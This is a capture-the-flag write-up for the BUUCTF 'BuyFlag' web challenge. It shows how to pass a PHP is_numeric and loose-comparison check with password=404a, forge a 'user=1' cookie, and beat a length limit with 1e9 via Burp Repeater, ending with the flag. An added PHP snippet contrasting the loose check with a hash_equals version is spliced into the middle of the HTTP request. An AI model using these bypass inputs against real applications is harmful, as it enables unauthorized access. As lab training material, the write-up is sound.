BUUCTF Range 19 -- [极客大挑战 2019] BuyFlag
The page source reveals a pay.php:
http://ba3024ac-f84c-425d-827f-6e52b1dee359.node4.buuoj.cn:81/pay.php
The page displays:
FLAG
FLAG NEED YOUR 100000000 MONEY
ATTENTION
If you want to buy the FLAG:
You must be a student from CUIT!!!
You must be answer the correct password!!!
Only Cuit's students can buy the FLAG
The page source also contains:
<!--
~~~post money and password~~~
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    }elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
-->
So the page checks the POST parameter password: is_numeric() rejects anything that is a number or a numeric string, yet the next branch requires the parameter to be equal to 404. Under PHP's loose (weak-typed) comparison, a string such as "12df" is compared by its leading integer part, 12, so sending the POST parameter password=404a passes the check.
To send the parameters with Burp Suite, capture the request first, send it to Repeater, change the HTTP method to POST, add the header line Content-Type: application/x-www-form-urlencoded, and then add the POST parameters in the raw body:
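To show the comparison this writeup relies on side by side with a check that is not fooled by it, here is an added PHP example (not the challenge's own code): loose_check() mirrors the pay.php logic, and strict_check() is an assumed hardened replacement.

```php
<?php
// Added example, not part of the original writeup: the challenge's loose check
// next to a hardened version, evaluated on the same inputs.

// Loose check, as in pay.php: an is_numeric() gate followed by == against an int.
function loose_check(string $password): bool {
    if (is_numeric($password)) {
        return false;               // "password can't be number"
    }
    return $password == 404;        // loose comparison: string vs int
}

// Hardened check: compare strings byte for byte, so no numeric coercion occurs.
// The expected value '404' is an assumed placeholder; a real application would
// compare against a stored secret, still with hash_equals().
function strict_check(string $password): bool {
    return hash_equals('404', $password);
}

// Constructed sample inputs covering numeric, leading-numeric and plain strings.
$samples = ['404', '404a', '404.0', '1e9', 'abc'];
foreach ($samples as $s) {
    printf("%-6s loose=%s strict=%s\n", $s,
        var_export(loose_check($s), true),
        var_export(strict_check($s), true));
}
// Language rule behind the results: on PHP 7.x a leading-numeric string such as
// "404a" is converted to 404 before == is applied, so loose_check() accepts it
// while strict_check() does not. On PHP 8, comparing an int with a non-numeric
// string is done as a string comparison, so "404a" fails both checks.
```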
Cookie: user=1
Connection: close

password=404a&money=199999999
The response:
you are Cuiter
Password Right!
Nember lenth is too long
Sending money=1000000000 returns the message that the number length is too long, so use scientific notation instead: 1e9.
you are Cuiter
Password Right!
flag{a14bb861-6842-4dec-8d8f-1c07ff13a732}